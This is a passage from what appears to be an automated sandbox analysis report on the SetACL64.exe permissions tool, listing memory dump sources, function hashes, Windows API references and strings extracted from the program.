                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: ErrorLast$CurrentFeatureInfoLocalePresentProcessProcessortry_get_function
                              • String ID:
                              • API String ID: 959782435-0
                              • Opcode ID: 2bcabf90133226a21d35661e2228ce33e0177fd6ac88b51c4b4a600c06c3f94b
                              • Instruction ID: c72128812a26805762d70c6a1f2b05cdb7cc3d4d6a0589bc772986a4729976c1
                              • Opcode Fuzzy Hash: 2bcabf90133226a21d35661e2228ce33e0177fd6ac88b51c4b4a600c06c3f94b
                              • Instruction Fuzzy Hash: DEB1BDA2A18646C2EB74DF21D4116F933A1EB84BD8F0142B2DA9DC76CADF3EE551C740
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 623b00d227a4fe3d8e7d417f2b5f2d0ceb4a2eacd56c3b69df033875c0a5ee96
                              • Instruction ID: 774dcf99b49313f3f7c83c8084da495de73ae34824b3e41f08fd0cc1ac984075
                              • Opcode Fuzzy Hash: 623b00d227a4fe3d8e7d417f2b5f2d0ceb4a2eacd56c3b69df033875c0a5ee96
                              • Instruction Fuzzy Hash: 4B61CFA2A28B9A82EB218B59A0409B96760FB55BD0F449731DA6ED7B84DF3CF541C700
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 012a925594e754a9d222877570faf136357706970be2381824b09a92e36c6048
                              • Instruction ID: ff1ae7b1ff9f906309b5e38aa03431c5ff9bac1ba1036fa2b2a519e9a82ac163
                              • Opcode Fuzzy Hash: 012a925594e754a9d222877570faf136357706970be2381824b09a92e36c6048
                              • Instruction Fuzzy Hash: FE51F496B1C24286EB78DB2588016BF2799EF40BC4F8451B6EE4DD72C9CF2DE845C711
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: ErrorFreeHeapLast
                              • String ID:
                              • API String ID: 485612231-0
                              • Opcode ID: 96fcb21ad8d9e1d397d87a8444214fb1efd1c750d05a8d23a81fb3cc91b1dc5a
                              • Instruction ID: 953a563cc8c7a1b19ceb8efbb387a5008bae0ec7c0dd7fb9980214c0566d5dc2
                              • Opcode Fuzzy Hash: 96fcb21ad8d9e1d397d87a8444214fb1efd1c750d05a8d23a81fb3cc91b1dc5a
                              • Instruction Fuzzy Hash: 9D412562B24A5882EF54CF6AD9141A9B7A1FB8CFD4B099132DE0DC7B58DE3DD1418300
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 661991537337df00cfedef2c042225d99e55b89d68283520a0b1d8c619bedd07
                              • Instruction ID: 0c5a7724c399b0de6896db49b8d399fd707fd26f00cd2039058527ed04c1f9c4
                              • Opcode Fuzzy Hash: 661991537337df00cfedef2c042225d99e55b89d68283520a0b1d8c619bedd07
                              • Instruction Fuzzy Hash: FFF062F1B182958ADBA48F6DA80262977D0F7483C1F94C0B9D68DC3B04DA3C90608F14
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0d0e1896d5a2671fcb65b32faac8bfb0f24e93e9d35c82eef40207f8067d8423
                              • Instruction ID: 11ff261bc61706282a80d29171e3f1e7ec37d64a1c43a82be860d33d754b6b1e
                              • Opcode Fuzzy Hash: 0d0e1896d5a2671fcb65b32faac8bfb0f24e93e9d35c82eef40207f8067d8423
                              • Instruction Fuzzy Hash: 8EA001A190889690E6288B01E961065A220EB61B91B4100B1C20DC2060EE2CA6018244
                              APIs
                                • Part of subcall function 00007FF697044810: FindResourceW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF69704FCA1), ref: 00007FF697044859
                                • Part of subcall function 00007FF697044810: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF69704FCA1), ref: 00007FF69704486D
                                • Part of subcall function 00007FF697044810: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF69704FCA1), ref: 00007FF697044882
                                • Part of subcall function 00007FF697044810: FreeResource.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF69704FCA1), ref: 00007FF697044964
                              • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697038D9E
                              • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697038DA4
                              • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697038DAA
                              • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697038DB0
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: Resource_invalid_parameter_noinfo_noreturn$FindFreeLoadLock
                              • String ID: SetACL by Helge Klein$ -actn Action1 ParametersForAction1$ [-actn Action2 ParametersForAction2]$ [Options]$=======$==============$Copyright: Helge Klein$Documentation and examples are maintained at$Documentation:$FileVersion$Homepage: https://helgeklein.com$License: Freeware$SetACL -on ObjectName -ot ObjectType$Syntax:$The usage reference can be found at$Version: $https://helgeklein.com.$https://helgeklein.com/setacl/documentation/command-line-version-setacl-exe
                              • API String ID: 3000141576-3422969368
                              • Opcode ID: 69f405b78d0f5892647151657973b3344c7a68e1b36205c54eef986998ac8fed
                              • Instruction ID: 530d003e04f9705af6509f7fe22c743387bdf2e90b184b17fdb8ca175e9f1156
                              • Opcode Fuzzy Hash: 69f405b78d0f5892647151657973b3344c7a68e1b36205c54eef986998ac8fed
                              • Instruction Fuzzy Hash: FA916CA1E28A4294EB24DB64E8553BC2331EFA43E8F9045B1E61DC36E6EF7CE544C354
                              APIs
                              • try_get_function.LIBVCRUNTIME ref: 00007FF6970882AF
                              • try_get_function.LIBVCRUNTIME ref: 00007FF6970882CE
                                • Part of subcall function 00007FF697087998: GetProcAddress.KERNEL32(?,?,00000006,00007FF697087E8A,?,?,0000B6CF377E791F,00007FF69708402A,?,?,0000B6CF377E791F,00007FF69707E201), ref: 00007FF697087AF0
                              • try_get_function.LIBVCRUNTIME ref: 00007FF6970882ED
                                • Part of subcall function 00007FF697087998: LoadLibraryW.KERNELBASE(?,?,00000006,00007FF697087E8A,?,?,0000B6CF377E791F,00007FF69708402A,?,?,0000B6CF377E791F,00007FF69707E201), ref: 00007FF697087A3B
                                • Part of subcall function 00007FF697087998: GetLastError.KERNEL32(?,?,00000006,00007FF697087E8A,?,?,0000B6CF377E791F,00007FF69708402A,?,?,0000B6CF377E791F,00007FF69707E201), ref: 00007FF697087A49
                                • Part of subcall function 00007FF697087998: LoadLibraryExW.KERNEL32(?,?,00000006,00007FF697087E8A,?,?,0000B6CF377E791F,00007FF69708402A,?,?,0000B6CF377E791F,00007FF69707E201), ref: 00007FF697087A8B
                              • try_get_function.LIBVCRUNTIME ref: 00007FF69708830C
                                • Part of subcall function 00007FF697087998: FreeLibrary.KERNEL32(?,?,00000006,00007FF697087E8A,?,?,0000B6CF377E791F,00007FF69708402A,?,?,0000B6CF377E791F,00007FF69707E201), ref: 00007FF697087AC4
                              • try_get_function.LIBVCRUNTIME ref: 00007FF69708832B
                              • try_get_function.LIBVCRUNTIME ref: 00007FF69708834A
                              • try_get_function.LIBVCRUNTIME ref: 00007FF697088369
                              • try_get_function.LIBVCRUNTIME ref: 00007FF697088388
                              • try_get_function.LIBVCRUNTIME ref: 00007FF6970883A7
                              • try_get_function.LIBVCRUNTIME ref: 00007FF6970883C6
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: try_get_function$Library$Load$AddressErrorFreeLastProc
                              • String ID: AreFileApisANSI$CompareStringEx$EnumSystemLocalesEx$GetDateFormatEx$GetLocaleInfoEx$GetTimeFormatEx$GetUserDefaultLocaleName$IsValidLocaleName$LCIDToLocaleName$LCMapStringEx$LocaleNameToLCID
                              • API String ID: 3255926029-3252031757
                              • Opcode ID: 9211e9d41fbef9106278706ba9ffd9f3a7d029d209f8dabeb844061a5d1a6813
                              • Instruction ID: 90904a1d57ec2f79eee7469709ec84ac13a10ef384246f49be293cf555b2506c
                              • Opcode Fuzzy Hash: 9211e9d41fbef9106278706ba9ffd9f3a7d029d209f8dabeb844061a5d1a6813
                              • Instruction Fuzzy Hash: C33192E0D08A47A1F628DBA5E869AF1A721EF443E4FC154BBD10DC32A5DF3DA649C340
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID:
                              • String ID: " $AddTrusteesFromFile$Input file for trustee operation opened: '
                              • API String ID: 0-3105513592
                              • Opcode ID: cfcd9179b3afa49e84231abe562083495f775b235c5cd478525bc830438bbd8e
                              • Instruction ID: af83d3891f99567ebf502e58aec476e683d05d12e537335f92c372c7e093635f
                              • Opcode Fuzzy Hash: cfcd9179b3afa49e84231abe562083495f775b235c5cd478525bc830438bbd8e
                              • Instruction Fuzzy Hash: 4EA18BA2A29B5284F720DB64E8953ED3371FB44388F405875EA4CD7AAADF7CE580C344
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo_noreturn$CriticalSection$EnterLeave
                              • String ID: on $====================================================================$FileVersion$SetLogFile$Starting SetACL.exe
                              • API String ID: 363805048-2110037876
                              • Opcode ID: bfe008777ad23c9cdc2350b9679eda7746b6eef8af8c9e99fa761d27b66fba6f
                              • Instruction ID: 6a02166349ce22af5acf925ba5bd26bf9c6b818863c8794a311de0bda686acc0
                              • Opcode Fuzzy Hash: bfe008777ad23c9cdc2350b9679eda7746b6eef8af8c9e99fa761d27b66fba6f
                              • Instruction Fuzzy Hash: DC2293A2B19B8181EF109B79E5493AD6372EB917E4F505275EA5CC3AE9DF7CE180C300
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo_noreturn$ErrorLast$CreateDirectory
                              • String ID: ' could not be created because: $CreateDirectoryAPIWrapper$Created the directory '$Directory already exists: '$The directory '
                              • API String ID: 3201042626-1824261680
                              • Opcode ID: d1b5d7231ef0ce28a8e66e00800bd7d89ee647de3540f67a21a8ce9304b88add
                              • Instruction ID: e0c137e4649180f89ac51989c8870fa31cbc8e67eba6a2e1e84fc0e5de96f687
                              • Opcode Fuzzy Hash: d1b5d7231ef0ce28a8e66e00800bd7d89ee647de3540f67a21a8ce9304b88add
                              • Instruction Fuzzy Hash: 8F027CE2B19B4285EA20CB78D4553AC3362EB447E8F505771DA6CD36E9EE7CE285C304
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo_noreturn$ErrorLastVersion
                              • String ID: Prepare$SetACL only supports Windows Vista and later.$The version of your operating system could not be determined.
                              • API String ID: 1165008562-2181592180
                              • Opcode ID: 727d599cbf774fd4c5ba4d8356de33424bd120d4bccaa165a2686ec5f0d8e0cb
                              • Instruction ID: 3d497dc835b6e5d21726b5f5d53fbc8ad38b5481236e53c060a3596652eebbee
                              • Opcode Fuzzy Hash: 727d599cbf774fd4c5ba4d8356de33424bd120d4bccaa165a2686ec5f0d8e0cb
                              • Instruction Fuzzy Hash: 6C71A4B2A1978381EA209B69E4853AEA321FB847E8F401575E75DC3AE9DF7CE144C704
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo_noreturn
                              • String ID:
                              • API String ID: 3668304517-0
                              • Opcode ID: 46baa353a109fce6319f0045732bcd5145af92d8f24574fb33639b16f7aed1b8
                              • Instruction ID: f9e1b65a9e9293eba58d0792bdc55321b91df89340e3f85f20ec4a3dc003eca1
                              • Opcode Fuzzy Hash: 46baa353a109fce6319f0045732bcd5145af92d8f24574fb33639b16f7aed1b8
                              • Instruction Fuzzy Hash: 1F413FE1B5B75340FA64A769A89A3BD1222EF457E4F401DB1D71CC66E7DE2CA180C208
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo
                              • String ID:
                              • API String ID: 3215553584-0
                              • Opcode ID: c5659fc54ca624ddf6d2490e80867d1b248a83083ebe8249bddcb2d4f27d4c86
                              • Instruction ID: 5edca8976423c747697478178b58b4343aa301f57aaebfc2bfe302b1e27e6efa
                              • Opcode Fuzzy Hash: c5659fc54ca624ddf6d2490e80867d1b248a83083ebe8249bddcb2d4f27d4c86
                              • Instruction Fuzzy Hash: C53110E1A5B75344FA60B76998EA3BE1222EF457E4F402DB1DB1CC65D7DE2CA180C208
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo_noreturn$Enum$CloseOpenResource
                              • String ID: > failed with: $GetUNCPathOfMappedDrive$Retrieving the remote path for mapped drive L<
                              • API String ID: 3788045339-1117730555
                              • Opcode ID: 26ce30747a7c3376bf249c0467c749ccf99a2e6852225826950c2a27f422109d
                              • Instruction ID: e8b45c555524122a083af02bbcf1948913f0636f7c8848ba5e3d0fa8da5a9672
                              • Opcode Fuzzy Hash: 26ce30747a7c3376bf249c0467c749ccf99a2e6852225826950c2a27f422109d
                              • Instruction Fuzzy Hash: DF1271A2B1978181EA209B69E4943AD7362FB847E4F505275EB5DC7BE9DF7CE180C300
                              APIs
                              • IsValidAcl.ADVAPI32(?,?,?,?,?,?,00000000,00000000,?,?,00000000,00000000,?,?,00007FF6970699CE), ref: 00007FF69706A2F4
                              • GetAce.ADVAPI32(?,?,?,?,?,?,00000000,00000000,?,?,00000000,00000000,?,?,00007FF6970699CE), ref: 00007FF69706A30D
                              • DeleteAce.ADVAPI32(?,?,?,?,?,?,00000000,00000000,?,?,00000000,00000000,?,?,00007FF6970699CE), ref: 00007FF69706A338
                              • GetAclInformation.ADVAPI32(?,?,?,?,?,?,00000000,00000000,?,?,00000000,00000000,?,?,00007FF6970699CE), ref: 00007FF69706A354
                              • GetLengthSid.ADVAPI32(?,?,?,?,?,?,00000000,00000000,?,?,00000000,00000000,?,?,00007FF6970699CE), ref: 00007FF69706A361
                              • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000000,?,?,00000000,00000000,?,?,00007FF6970699CE), ref: 00007FF69706A37F
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: DeleteErrorInformationLastLengthValid
                              • String ID:
                              • API String ID: 1967920013-0
                              • Opcode ID: fa47e8455b8d5f9eec009974956262ef4a7b95b3ec48f1941adf8a6189de3f14
                              • Instruction ID: cd053bf05a42706f26ee890c6ad03a67c19cdba1db4e4c6a5219beeee2033488
                              • Opcode Fuzzy Hash: fa47e8455b8d5f9eec009974956262ef4a7b95b3ec48f1941adf8a6189de3f14
                              • Instruction Fuzzy Hash: EB817FE2A0C68286EB60AB22A86527A77A1FFD4FD4F044175EE8EC3754EF3CD5448710
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: String$ArraySafe$AllocFree$BoundConcurrency::cancel_current_taskDataVariant$AccessClearInitUnaccess
                              • String ID: GetSD$__systemsecurity=@
                              • API String ID: 2119716662-3672729512
                              • Opcode ID: a4bc5dedb66d47c51631d50f3265cb4853a502811ef6be4f41ada5bd415db247
                              • Instruction ID: 13ee0f46f617c9f90d7d1827ace39eac92e6216b925213b2d7f5a5f808957aad
                              • Opcode Fuzzy Hash: a4bc5dedb66d47c51631d50f3265cb4853a502811ef6be4f41ada5bd415db247
                              • Instruction Fuzzy Hash: 859173B1A09B4286EA34AB21E82137973A4FF94BD0F048575DA4EC3795DF7CE984C740
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo_noreturn
                              • String ID: Prepare$The object type was not specified.
                              • API String ID: 3668304517-3861202280
                              • Opcode ID: f6146cc0b52683d5413a34b6f752e51676bb9cf189912ec02217d27d55aa915d
                              • Instruction ID: 6ee293d227addd2d3a9fc929015784e8c308b135fb724047dd8bc2fd4ebae910
                              • Opcode Fuzzy Hash: f6146cc0b52683d5413a34b6f752e51676bb9cf189912ec02217d27d55aa915d
                              • Instruction Fuzzy Hash: A031B8A1A1A78341EA209B69E4963AE6321EF453F4F405971F75CC36EACE7CE141C704
                              APIs
                              Strings
                              Memory Dump Source
